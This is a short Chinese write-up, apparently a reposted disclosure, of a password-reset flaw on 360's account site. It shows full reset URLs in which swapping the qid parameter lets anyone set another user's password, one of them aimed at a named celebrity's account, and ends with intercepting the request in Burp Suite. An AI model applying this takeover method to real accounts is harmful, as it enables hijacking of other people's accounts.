看看发现者是怎么发现、利用的吧——
发现者称,他是因为忘记了360账号的密码才发现这个漏洞的。通过密码找回功能,他得到了来自360的一封邮件,其中有个修改密码的链接地址:
http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290669
末尾的qid=507290669就是用户标识符。如果改成别人的会怎么样呢? http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290670
打开这个链接,360网站提示可以修改,这就意味着所有账号都如此。
虽然不知道别人的账号,进入个人中心也没有ID提示,但是原作者注意到了360旗下的另一个网站我喜欢: http://www.woxihuan.com/star/timeline?qid=268296138
而从这里的qid是可以找到账号名称的,比如这个就对应明星苗圃。
于是我们得到了如下链接: http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=268296138
接下来要用到常见的黑客抓包工具Burpsuite,在利用找回密码链接修改密码时截取它post的包,就能成功修改别人的密码。
| 
